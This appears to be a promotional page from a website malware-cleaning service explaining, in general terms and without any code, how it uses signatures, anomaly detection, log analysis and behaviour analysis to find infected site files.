Contrary to what others say, we don't "just run some script" to find and remove website malware.

Our methods are many as our opponents (the cybercriminals) have many methods to hide their malware.

Our methods

Since we've cleaned over 1,000,000 websites, we've collected many files that have been positively identified as malicious. We create signatures, much like your anti-malware program does on your local computer, to positively identify malware in other infected website files.

Our signatures are broad based and not hash based. We take into account the fact that hackers may add extra spaces throughout their code to evade detection by many other programs. There are many other "tricks" hackers use to hide their infectious code - but we find them all. We use signatures as our database can identify 90% of website malware with just this method alone.

This broad based approach allows us to use fewer rules, without sacrificing an ounce of accuracy. It actually increases our accuracy because if one group of hackers use one variable name but a different group uses a different variable name, but basically the same code, our system will positively identify both.

The signature database is generally updated numerous times during the day. For our VPS and Dedicated software, these are updated with new signatures once every hour.

Anomaly detection involves setting a baseline standard for what is considered normal and what is considered abnormal. Anything determined to be abnormal is analyzed further. If it's malicious or potentially malicious, it's removed.

One basic example is finding a PHP file in the images folder. It probably doesn't belong there - but it might. Files in an images folder that are not detected by our first-line scanner is further analyzed. Another example is finding a file with WordPress code in it on a website that was created with Joomla. Could it be legitimate? Possibly. Our systems will determine that for sure.

This engine has many rules and is constantly being updated. This engine isn't updated as frequently as the signatures due to the variety of rules already used.

Our anomaly detection engine is where our log file analysis occurs. Not all hosting providers make the log files accessible, but those that do really make our job easier. We've learned what patterns are normal and which patterns are not. This leads to learning what patterns of traffic are abnormal. Any abnormal traffic is traced to see what files are being targeted. This can lead us to previously unknown backdoor shell scripts that the hackers have uploaded.

Behavior analysis (BA) involves examining code that pass the first 2 tests (signatures & anomaly detection). Here our system is actually analyzing the code looking for suspicious behavior.

Our BA engine looks for code that would allow uploading files to the site, or calling a program snippet from another site. Any of these behaviors and more are flagged by this engine.

It's the final step in our analysis and provides some insight, but the fewest detections of all our processes.